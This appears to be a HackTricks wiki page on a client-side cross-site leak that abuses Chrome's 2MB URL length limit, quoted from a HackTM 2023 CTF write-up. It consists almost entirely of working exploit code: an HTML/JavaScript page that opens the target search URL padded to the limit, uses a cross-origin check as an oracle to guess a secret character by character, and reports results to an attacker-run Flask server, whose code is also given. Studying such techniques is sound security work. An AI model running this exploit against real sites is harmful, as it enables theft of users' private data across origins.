# URL Max Length - Client Side

{{#include ../../banners/hacktricks-training.md}}

Code from [https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit](https://ctf.zeyu2001.com/2023/hacktm-ctf-qualifiers/secrets#unintended-solution-chromes-2mb-url-limit)

```html
<html>
  <body></body>
  <script>
    ;(async () => {
      const curr = "http://secrets.wtl.pw/search?query=HackTM{"

      const leak = async (char) => {
        fetch("/?try=" + char)
        let w = window.open(
          curr + char + "#" + "A".repeat(2 * 1024 * 1024 - curr.length - 2)
        )

        const check = async () => {
          try {
            w.origin
          } catch {
            fetch("/?nope=" + char)
            return
          }
          setTimeout(check, 100)
        }
        check()
      }

      const CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789"

      for (let i = 0; i < CHARSET.length; i++) {
        leak(CHARSET[i])
        await new Promise((resolve) => setTimeout(resolve, 50))
      }
    })()
  </script>
</html>
```

Server side:

```python
from flask import Flask, request

app = Flask(__name__)

CHARSET = "abcdefghijklmnopqrstuvwxyz-_0123456789"
chars = []

@app.route('/', methods=['GET'])
def index():
    global chars

    nope = request.args.get('nope', '')
    if nope:
        chars.append(nope)

    remaining = [c for c in CHARSET if c not in chars]

    print("Remaining: {}".format(remaining))

    return "OK"

@app.route('/exploit.html', methods=['GET'])
def exploit():
    return open('exploit.html', 'r').read()

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=1337)
```

{{#include ../../banners/hacktricks-training.md}}